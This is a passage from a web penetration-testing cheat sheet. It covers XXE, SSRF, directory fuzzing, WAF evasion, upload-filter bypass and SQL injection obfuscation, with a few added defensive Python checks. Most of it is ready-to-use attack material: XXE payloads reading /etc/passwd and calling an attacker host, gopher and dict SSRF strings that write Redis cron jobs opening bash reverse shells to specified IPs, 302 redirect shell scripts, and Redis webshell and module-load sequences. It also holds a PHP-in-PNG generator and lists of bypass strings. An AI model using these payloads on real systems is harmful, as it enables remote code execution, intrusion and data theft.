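        raise UnsafeXML(f"DOCTYPE not allowed (root {name!r})")

    def forbid_entity(*_):
        raise UnsafeXML("entity declaration not allowed")

    def forbid_external(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity {system_id!r} not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external

    elements, text_stack = [], []

    def start(tag, attrs):
        text_stack.append([])

    def chars(chunk):
        if text_stack:
            text_stack[-1].append(chunk)

    def end(tag):
        elements.append((tag, "".join(text_stack.pop()).strip()))

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}")
    return elements


def is_rejected(data: bytes) -> bool:
    try:
        parse_strict(data)
        return False
    except UnsafeXML:
        return True


def admin_record(username: str, password: str) -> str:
    """Build the <admin> element from the injection example with both values escaped."""
    return (f"<admin><username>{escape(username)}</username>"
            f"<password>{escape(password)}</password></admin>")


# Constructed samples: the file-read payload from this section, an OOB variant and benign input.
XXE = b'<?xml version="1.0"?><!DOCTYPE creds [<!ENTITY goodies SYSTEM "file:///etc/passwd">]><creds>&goodies;</creds>'
OOB = b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % remote SYSTEM "http://attacker.invalid/test.dtd">%remote;]><x/>'
BENIGN = b'<?xml version="1.0"?><creds><user>alice</user><role>viewer</role></creds>'
INJECTION = 'admin</password></admin><admin><name>hack</name><password>hacker</password></admin>'

if __name__ == "__main__":
    print("XXE rejected:", is_rejected(XXE), "| OOB rejected:", is_rejected(OOB))
    print("benign:", parse_strict(BENIGN))
    doc = f"<manager>{admin_record('admin', INJECTION)}</manager>".encode()
    print("escaped record parses to:", parse_strict(doc))
```

The same two settings carry over to any other parser: disable DTD processing (or at least external general and parameter entities) on the parser object, and build XML with an API or escaping function rather than string concatenation. With both in place the escaped injection string above is stored as a literal password and the document still contains exactly one <admin> element.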

SSRF

Definition
Server-side request forgery: the attacker constructs a request that the server itself sends. The server offers a feature that fetches data from other servers or applications and neither filters nor restricts the target address.
Causes
Misuse of file_get_contents(), fsockopen(), curl_exec(), fopen(), readfile() and similar functions leads to SSRF.
Discovery
Transcoding services; online translation; fetching a hyperlink's title or other content for display; anything that requests a remote resource: loading or downloading an image by URL, bookmarking images or articles; anything that makes outbound requests: site collectors, web scrapers; avatars loaded remotely; every place that takes a URL or an IP address; built-in database features (MongoDB's copyDatabase); mail systems; file processing and online processing tools. Look for URL keywords: share, wap, url, link, src, source, target, u, 3g, display, sourceURl, imageURL, domain.
XML
<!ENTITY % d SYSTEM "http://wuyun.org/evil.dtd">
<!ENTITY % file system "file:///etc/passwd" >
<!ENTITY % d SYSTEM "http://wuyun.org/file?data=%file">
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://wuyun.org/urlin">
<xenc:AgreementMethod Algorithm="http://wuyun.org/1">
<xenc:EncryptionProperty Target="http://wuyun.org/2">
<xenc:CipherReference URI="http://wuyun.org/3">
<xenc:DataReference URI="http://wuyun.org/4">
<Reference URI="http://wuyun.org/5">
<To xmlns="http://www.w3.org/2005/08/addressing">http://wuyun.org/to</To>
<ReplyTo xmlns="http://www.w3.org/2005/08/addressing"><Address>http://wuyun.org/rto</Address>
<input message="wooyun" wsa:Action="http://wuyun.org/ip" />
<output message="wooyun" wsa:Action="http://wuyun.org/op" />
<wsp:PolicyReference URI="http://wuyun.org/pr">
<fed:Federation FederationID="http://wuyun.org/fid">
<fed:FederationInclude>http://wuyun.org/inc</fed:FederationInclude>
<fed:TokenIssuerName>http://wuyun.org/iss</fed:TokenIssuerName>
<mex:MetadataReference><wsa:Address>http://wuyun.org/mex</wsa:Address></mex:MetadataReference>
<edmx:Reference URI="http://wuyun.org/edmxr">
<edmx:AnnotationsReference URI="http://wuyun.org/edmxa">
<xbrli:identifier scheme="http://wuyun.org/xbr">
<link:roleType roleURI="http://wuyun.org/role">
<stratml:Source>http://wuyun.org/stml</stratml:Source>
Databases
MongoDB
db.copyDatabase('\r\nconfig set dbfilename ssrf\r\nquit\r\n','test','10.6.4.166:6379')
PostgreSQL
select dblink_send_query('host=127.0.0.1 dbname=quit user=\'\r\nconfig set dbfilename wyssrf\r\n\quit\r\n\' password=1 port=6379 sslmode=disable','select version();');
MSSQL
select openrowset('SQLOLEDB', 'server=192.168.1.5;uid=sa;pwd=sa;database=master')
select * FROM OpenDatasource('SQLOLEDB', 'Data Source=ServerName;User ID=sa;Password=sa').Northwind.dbo.Categories
Image-processing functions
FFmpeg: concat:http://wyssrf.wuyun.org/header.y4m|file:///etc/passwd
ImageMagick: fill 'url(http://wyssrf.wuyun.org)'
Attacks
Test code (requires the PHP curl module: apt-get install php7.0-curl):
<?php
echo 'r u ok?';
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>
Uses: port-scan the internal network or localhost and collect service banners; attack applications running internally or locally; fingerprint internal web applications by requesting default files (e.g. readme); attack internal and external web applications, mainly with attacks that work through GET parameters alone (e.g. Struts2, SQLi); read internal resources (e.g. local files via the file wrapper); use as a pivot that bypasses the CDN; exploit unauthenticated Redis or HTTP CRLF injection to obtain a shell.
File read
> curl -v 'http://192.168.0.110/ssrf.php?url=file:///etc/passwd'
?url=php://filter/read=convert.base64-encode/resource=./1.php
Port probing
> curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:22/'
> curl -v 'http://www.xx.com/ssrf.php?url=dict://127.0.0.1:6379/info'
SSRF + Redis
> curl -v 'http://192.168.0.112/ssrf.php?url=gopher://192.168.0.120:6379/_*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.0.108%2f12345%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'

302 reverse shell
?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=flushall
302.php:
<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>
?url=http://xxxx/reverse.php?s=dict&ip=10.20.*.*&port=6379&bhost=*.*.*.*&bport=1234
reverse.php:
<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>
?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dir:/var/spool/cron/
?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=config:set:dbfilename:root
?url=http://xxxx/302.php?s=dict&ip=10.20.*.*&port=6379&data=save
The variables can be iterated with Burp Intruder.
MySQL
https://github.com/FoolMitAh/mysql_gopher_attack
https://fireshellsecurity.team/isitdtu-friss/
WebLogic SSRF + Redis
Probe: /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:80
Redis reverse shell:
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/121.36.67.230/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://192.168.0.110:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F121.36.67.230%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
SSRF + internal Struts2: http://www.xx.com/ssrf.php?url=http://10.1.1.1/action?action?redirect:http://attackerip/
UEditor SSRF
/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png
Discuz
/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
Finding live hosts
Direct access: http://www.xx.com/ssrf.php?url=http://192.168.0.1
Forged POST request:
> curl -v 'http://www.xx.com/ssrf.php?url=gopher://192.168.0.10:80/_POST%20/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb'
Bypass methods
Localhost: http://127.0.0.1 = http://localhost
[::]: http://[::]:80 = http://127.0.0.1
@: http://www.xx.com/1.php?url=http://www.xx.com@127.0.0.1:8080
Short URLs: http://tool.chinaz.com/tools/dwz.aspx http://dwz.cn/
DNS resolution: http://www.qq.com.127.0.0.1.xip.io resolves to 127.0.0.1; or set an A record on your own domain pointing to 127.0.0.1
Base conversion of 127.0.0.1: octal 0177.0.0.1, hexadecimal 0x7f.0.0.1, decimal 2130706433 (http://www.bejson.com/convert/ip2int/)
Full-width stops: 127。0。0。1
302 script:
<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>
The attacker's VPS listens on 8080.
dict protocol: dict://www.attack.com:8080/hello:dict is equivalent to ssrf.php?url=http://attack.com/302.php?s=dict&ip=www.attack.com&port=8080&data=hello:dict
gopher protocol: gopher://www.attack.com:8080/gopher is equivalent to ssrf.php?url=http://attack.com/302.php?s=gopher&ip=www.attack.com&port=8080&data=gopher
file protocol: create file.php on the attacking machine:
<?php header("Location: file:///etc/passwd"); ?>
ssrf.php?url=http://attack.com/file.php
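The definition at the top of this section ("no filtering or restriction of the target address") and the bypass list just above are two sides of the same check: a destination filter that compares strings will be beaten by localhost aliases, [::], user@host, octal/hex/decimal IPv4 and DNS names pointing inward. The following is an added example, not code from the original note, showing a destination check that works on the resolved addresses instead: it allows only http(s), parses the inet_aton spellings itself, resolves names, and requires every address to be globally routable. Standard library only; the resolver is injectable, and demo() uses constructed DNS answers so it runs offline. The host names in demo() come from this section or are constructed placeholders.

```python
# Added example (not from the original note): a destination check for an outbound-fetch
# feature, covering the bypasses listed above (localhost aliases, [::], user@host, octal/hex/
# decimal IPv4, DNS names that resolve to internal addresses). Standard library only; the
# resolver is injectable so the demo runs offline with constructed DNS answers.
import ipaddress
import re
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # dict://, gopher://, file:// etc. are never fetched

_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def canonical_ipv4(host: str):
    """Parse inet_aton spellings (0x7f.0.0.1, 0177.0.0.1, 2130706433, 127.1) to an IPv4Address, else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = [int(p, 16) if p[:2].lower() == "0x" else (int(p, 8) if p.startswith("0") else int(p))
              for p in parts]
    head, last = values[:-1], values[-1]
    if any(v > 255 for v in head) or last >= 1 << (8 * (5 - len(parts))):
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    number = (number << (8 * (5 - len(parts)))) | last  # the last part fills the remaining octets
    return ipaddress.IPv4Address(number)


def default_resolver(host: str) -> list:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_destination(url: str, resolver=default_resolver) -> tuple:
    """Return (ok, reason); ok only for http(s) URLs whose every address is globally routable."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parsed.scheme!r} not allowed"
    host = parsed.hostname  # lower-cased, brackets stripped, user:pass@ already removed
    if not host:
        return False, "no host"
    literal = canonical_ipv4(host)
    if literal is None:
        try:
            literal = ipaddress.ip_address(host)  # IPv6 literals such as :: or ::1
        except ValueError:
            literal = None
    if literal is not None:
        addresses = [literal]
    else:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
        if not addresses:
            return False, f"no addresses for {host!r}"
    for addr in addresses:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
        if not addr.is_global:  # covers loopback, private, link-local, unspecified, reserved
            return False, f"{host!r} -> {addr} is not globally routable"
    return True, f"{host!r} -> {', '.join(str(a) for a in addresses)}"


def demo() -> dict:
    """Evaluate the bypass spellings from this section with a constructed resolver (no network)."""
    fake_dns = {  # constructed answers standing in for DNS
        "example.com": ["93.184.216.34"],
        "localhost": ["127.0.0.1"],
        "www.qq.com.127.0.0.1.xip.io": ["127.0.0.1"],
        "intranet.corp.example": ["10.20.1.5"],
    }

    def resolver(host):
        if host not in fake_dns:
            raise socket.gaierror(f"unknown host {host}")
        return fake_dns[host]

    urls = [
        "https://example.com/avatar.png",
        "http://127.0.0.1/",
        "http://localhost/",
        "http://[::]:80/",
        "http://www.xx.com@127.0.0.1:8080/",
        "http://0177.0.0.1/",
        "http://0x7f.0.0.1/",
        "http://2130706433/",
        "http://www.qq.com.127.0.0.1.xip.io/",
        "http://intranet.corp.example/readme",
        "dict://127.0.0.1:6379/info",
        "file:///etc/passwd",
    ]
    return {u: check_destination(u, resolver)[0] for u in urls}


if __name__ == "__main__":
    for url, ok in demo().items():
        print(f"{'allow' if ok else 'block':5} {url}")
```

Two points the check alone does not cover, both used above: the 302 trick means every redirect target has to go through the same check (disable automatic redirects and re-validate), and DNS rebinding means the connection should be made to the address that was checked rather than resolving the name a second time.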
Converting a capture into a gopher payload
Capture a normal request during local testing:
> socat -v tcp-listen:4444,fork tcp-connect:目標IP:6379

Save the capture log as a txt file and convert it with a script into a gopher-compatible string. Conversion rules: drop any line whose first character is > or < (these mark request and response times); drop any line whose first three characters are +OK (the response); replace \r with %0d%0a; replace blank lines with %0a.
Works when run locally
For remote execution the spaces must be encoded and the result URL-encoded once more:
*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$63%0d%0a%0a%0a%0a*/1%20*%20*%20*%20*%20bash%20-i%20>&%20/dev/tcp/192.168.0.108/12138%200>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

Protocols
The curl version must be below 7.15.1.
file: read arbitrary files when output is echoed
dict: inspect ports, operate internal services
gopher: send GET/POST requests; URL-encode twice when using gopher
http/https: find live hosts
Writing a shell with the dict protocol
?url=dict://127.0.0.1:6379/set:x:<?php phpinfo();?>
?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/
?url=dict://127.0.0.1:6379/config:set:dbfilename:php.php
?url=dict://127.0.0.1:6379/save
Unicode-encoded form: ?url=dict://127.0.0.1:6379/set:x:"\x3C\x3Fphp\x20echo `$_GET[x]`\x3B\x3F\x3E"
Copying a shell to the target with SLAVEOF
From: http://r3start.net/index.php/2020/05/09/683
Set a shell key on your own Redis:
yourredis> FLUSHALL
yourredis> set shell "<?php phpinfo();?>"
?url=dict://127.0.0.1:6379/slaveof:yourredisIP:6379
?url=dict://127.0.0.1:6379/config:set:dir:/www/wwwroot/
?url=dict://127.0.0.1:6379/config:set:dbfilename:test.php
?url=dict://127.0.0.1:6379/save
?url=dict://127.0.0.1:6379/slaveof:no:one
Reverse shell with SLAVEOF
?url=dict://127.0.0.1:6379/slaveof:yourredisIP:6379
?url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so
?url=dict://127.0.0.1:6379/MODULE:LOAD:./exp.so
?url=dict://127.0.0.1:6379/SLAVEOF:NO:ONE
?url=dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb
?url=dict://127.0.0.1:6379/system.exec:'curl x.x.x.x/x'
?url=dict://127.0.0.1:6379/system.rev:x.x.x.x:8887

Fuzzing / scanning web

# dirb http://192.168.0.1 /root/asp.txt,/root/dir.txt -a "USER-AGENT" -c "Cookie" -z 100
# nikto -C all -h http://192.168.0.107                                    scan the web service with nikto
# wpscan --url http://192.168.0.107/ -e u --wordlist /root/wordlist.txt  enumerate users and brute-force passwords
# wpscan --url http://192.168.0.107/ -e vp                               scan for vulnerable plugins
# perl joomscan.pl --url 192.168.0.107
WFuzz
Brute-force files and directories:
> wfuzz -w wordlist URL/FUZZ.php
> wfuzz -w wordlist URL/FUZZ
Enumerate a numeric parameter:
> wfuzz -z range,000-999 -b session=session -b cookie=cookie http://127.0.0.1/getuser.php?uid=FUZZ
POST credential brute force (FUZnZ):
> wfuzz -w userList -w pwdList -d "username=FUZZ&password=FUZ2Z" http://127.0.0.1/login.php
Random HTTP header:
> wfuzz -z range,0000-9999 -H "X-Forwarded-For: FUZZ" http://127.0.0.1/get.php?userid=666
Fuzz through a proxy:
> wfuzz -w wordlist -p 127.0.0.1:1087:SOCKS5 URL/FUZZ
Basic-auth brute force:
> wfuzz -z list,"username-password" --basic FUZZ:FUZZ URL
[Result filtering] --hc or --ss hide results that match the condition; --sc, --sl, --sw or --sh show results that match the condition.
Cewl
Crawl a site into a wordlist: > cewl http://www.qq.com/ -w dict.txt
Set the minimum word length: > cewl http://www.qq.com/ -m 9 -w dict.txt
Extract e-mail addresses from a site: > cewl http://www.qq.com/ -n -e
Dirsearch
> python3 dirsearch.py --random-user-agents --recursive --thread 50 --extension php --plain-text-report report.txt --url http://127.0.0.1

Bypass WAF

SQL injection with chunked transfer encoding
https://github.com/c0ny1/chunked-coding-converter

The injection point is blocked when run normally
Use chunked transfer: right-click in Burp and select the extension

Run the injection with sqlmap

> python sqlmap.py -r 1.txt --batch --proxy=http://127.0.0.1:8080 --dbs
Automatically finding usable tampers
https://github.com/m4ll0k/Atlas
GET injection: python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
POST injection: python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Header injection: python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
Combining tampers: python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v
List tampers: python atlas.py -g
Example: python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
The request is blocked, so look for a tamper that bypasses the WAF: python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
A 200 response identifies versionedkeywords as a tamper that gets through; continue with it: python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords
Judging by the status code alone is sometimes unreliable, but it is still usable; improvise.
Junk data
#coding=utf-8
import random, string
from urllib import parse
# code by yzddMr6

varname_min = 5
varname_max = 15
data_min = 20
data_max = 25
num_min = 50
num_max = 100

def randstr(length):
    str_list = [random.choice(string.ascii_letters) for i in range(length)]
    return ''.join(str_list)

def main():
    data = {}
    for i in range(num_min, num_max):
        data[randstr(random.randint(varname_min, varname_max))] = randstr(random.randint(data_min, data_max))
    print('&' + parse.urlencode(data) + '&')

main()
Place the output before and after the field being injected.
Upload bypass
Image file headers
PNG's header is the hexadecimal bytes 89 50 4E 47 0D 0A 1A 0A; GIF is 47 49 46 38 37 61; JPG is FF D8 FF E0
Add an image header, or merge with an image and include the result
Extension case
Prefix the file name with [0x09]
Upload .htaccess
SetHandler application/x-httpd-php
Second rendering
GIF: take a reasonably large GIF, insert the shell near the end with C32Asm, upload, download it back, use Burp's Comparer to find the region that was not re-rendered, insert the shell there and upload again.
JPG: generate directly with a script: https://github.com/BlackFan/jpg_payload
PNG: generate directly with a script; first uncomment extension=php_gd2.dll in php.ini:
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img, './1.png');
?>
Upload php3, php4, phtml etc.
Append ::$DATA to the file name
ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA"
ConTent-Disposition: form-data; name="filepath"; filename="1.asp::$DATA\0x00\1.asp0x00.jpg"
asp . (space + dot)
php. . (dot + space + dot)
Double writing: phphpp
00 truncation
GET parameter: append %00 directly. POST parameter: change the byte to 00 in the hex editor.
Changing some fixed parameters
Remove the double quotes around the file name
Add a filename1 parameter
Change form to f+orm
Remove form-data
Add several spaces after Content-Disposition or form-data;
Quote followed by a line break
ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp"
Swap the positions of Content-Type and ConTent-Disposition
Space before the file name
filename=    "1.asp"
Space before name
Content-Disposition: form-data;      name="uploaded"; filename="1.asp"
Add + before or after form-data
Content-Disposition: +form-data; name="filepath"; filename="1.asp"
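The upload tricks above fall into two groups: file-name tricks (::$DATA, trailing dots and spaces, %00, double extensions, .htaccess, odd multipart headers) and content tricks (a fake image header, code surviving re-rendering). The following is an added example, not code from the original note, showing server-side checks that address both: a strict file-name grammar with an extension allowlist, a magic-byte check tied to the declared extension (the PNG, GIF and JPEG headers listed above), and a server-generated storage name so the client's name never reaches the file system. Standard library only; the sample uploads in demo() are constructed.

```python
# Added example (not from the original note): server-side checks for an image upload that
# make the file-name and header tricks above fail. Standard library only; sample uploads are
# constructed in demo().
import re
import secrets

# Extension allowlist with the magic bytes each must start with (PNG, GIF and JPEG headers as listed
# above; JPEG files start FF D8 FF, the fourth byte varies with the marker).
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")  # exactly one dot, no leading dot (.htaccess)
_CODE = re.compile(rb"<\?php|<\?=|<script\b", re.IGNORECASE)        # cheap extra check, not the main defence


def check_upload(client_name: str, data: bytes) -> tuple:
    """Return (True, server_name) for an acceptable image, else (False, reason)."""
    if "\x00" in client_name:
        return False, "NUL byte in file name"
    if "::" in client_name:
        return False, "NTFS stream syntax (::$DATA) in file name"
    # Drop any path component; strip trailing dots and spaces that Windows would silently remove
    # ("1.asp .", "php. .") before the grammar check, so the real extension is what gets checked.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1].rstrip(". ")
    match = _NAME.match(base)
    if not match:
        return False, f"file name {client_name!r} not acceptable"
    ext = match.group(1).lower()
    if ext not in IMAGE_MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, f"content does not look like {ext}"
    if _CODE.search(data):
        return False, "script markers inside image data"
    # The stored name is server-generated; the client's name never reaches the filesystem.
    return True, f"{secrets.token_hex(8)}.{ext}"


def demo() -> dict:
    """Run the checks over constructed uploads built from the tricks in this section."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed minimal PNG header
    cases = {
        "photo.png": png,                                   # legitimate
        "1.asp::$DATA": png,                                # NTFS stream suffix
        "shell.php. .": png,                                # trailing dot/space
        "x.phtml": png,                                     # alternative PHP extension
        "1.asp\x00.jpg": png,                               # NUL truncation
        ".htaccess": b"SetHandler application/x-httpd-php",  # handler override
        "a.jpg.php": png,                                   # double extension
        "fake.jpg": png,                                    # PNG bytes claiming to be JPEG
        "banner.gif": b"GIF89a" + b"<?php phpinfo(); ?>",  # GIF header with code appended
    }
    return {name: check_upload(name, data) for name, data in cases.items()}


if __name__ == "__main__":
    for name, (ok, detail) in demo().items():
        print(f"{name!r:20} {'stored as ' + detail if ok else 'rejected: ' + detail}")
```

The marker scan is deliberately secondary: the robust answer to the second-rendering trick is to decode the upload with an image library and write out a freshly encoded file, serve uploads from a location where the web server has no script handler, and never let the multipart headers (Content-Type, the quoting and spacing variants listed above) influence the decision.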
ASP + IIS
s%elect > select
s%u0065lect > select
s%u00f0lect > select
s%u0045lect = s%u0065lect = %u00f0lect
u --> %u0055 --> %u0075
n --> %u004e --> %u006e
i --> %u0049 --> %u0069
o --> %u004f --> %u006f --> %u00ba
s --> %u0053 --> %u0073
l --> %u004c --> %u006c
e --> %u0045 --> %u0065 --> %u00f0
c --> %u0043 --> %u0063
t --> %u0054 --> %u0074 --> %u00de --> %u00fe
f --> %u0046 --> %u0066
r --> %u0052 --> %u0072
m --> %u004d --> %u006d
ASP + IIS and ASPX + IIS
s%u006c%u0006ect > select
Apache
TEST /sql.php?id=1 HTTP/1.1
Case / keyword substitution
UniOn SeLECT
Mid(), substring(), substr()
Hex(), ascii()
sleep() = benchmark()
concat_ws() = group_concat()
Double URL encoding
Changing the request method
HPP parameter pollution
id=1&id=2&id=3 yields: ASP.NET + IIS: id=1,2,3; ASP + IIS: id=1,2,3; PHP + Apache: id=3
MSSQL:
GET + POST: GET: http://192.168.125.140/test/sql.aspx?id=1 union/*  POST: id=2*/select null,null,null
Without commas: ?id=1unionselect 1&id=2&id=3&id=4 from admin--
() using commas: ?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
Invalid-parameter form: ?a=/*&sql=xxx&b=*/  (a and b are invalid parameters)
Overflow form: ?id=1/*&id=*//*&id=*//*......&id=*//*&id=*/unionselect null,system_user,null from INFORMATION_SCHEMA.schemata
MySQL: ?id=1&id=1&id=1&id=1&id=1&id=1&id=1&id=….. &id=1unionselect 1,2 from admin
Databases
Access
Whitespace: %09, %0a, %0c, %0d, %16
MySQL
Comments: #, /*...*/, --[space] ...
Whitespace: [0x09, 0x0a-0x0d, 0x20, 0xa0]
Special symbols: %a (newline) can be combined with a comment: %23%0a, %2d%2d%0a. %21 ! exclamation mark; %2b + plus; %2d - minus; %40 @ at sign; %7e ~ tilde
Id=1unionselect(1),user()
Id=1union/*!12345select*/1,user()
Id=1unionselect@1,user()
Id=1unionselect {x 1},user()
Id=1unionselect"1",user()
Id=1unionselect\N,user()
Id=1unionselect 1,user()`
Id=1unionselect 1,user()""
Id=1unionselect 1,user()A
Id=1unionselect 1,user()`b
Id=1 union(select 1,(select/*!schema_name*/from information_schema.SCHEMATA limit 1,1))
Id=1 union(select 1,(select{x schema_name}from information_schema.SCHEMATA limit 1,1))
Id=1 union(select 1,(select(schema_name)from information_schema.SCHEMATA limit 1,1))
Floating-point numbers
Id= 1.0union select 1,user()
Id= 1.union select 1,user()
Id= 1E0union select 1,user()
Id=\Nunion select 1,user()
Id=1 unionselect user(),2.0from admin
Id=1unionselect user(),8e0from admin
Id=1unionselect user(),\Nfrom admin
Inline comments: /*!UnIon12345SelEcT*/ 1,user()    (version number in the range 1000-50540)
MySQL "black magic": select{x username}from {x11 test.admin};
Substring functions: Mid(version(),1,1) Substr(version(),1,1) Substring(version(),1,1) Lpad(version(),1,1) Rpad(version(),1,1) Left(version(),1) reverse(right(reverse(version()),1))
Concatenation: concat(version(),'|',user()); concat_ws('|',1,2,3)
Character conversion: Ascii() char() Hex() Unhex()
Comma filtered: 127'unionselect * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)#  equivalent to unionselect 1,2,3,4,5
union select * from (select 1)a join(select{x schema_name} from information_schema.SCHEMATA limit 1,1)b
limit 1 offset 0 is equivalent to limit 1,0
mid(version() from 1 for 1) is equivalent to Mid(version(),1,1)
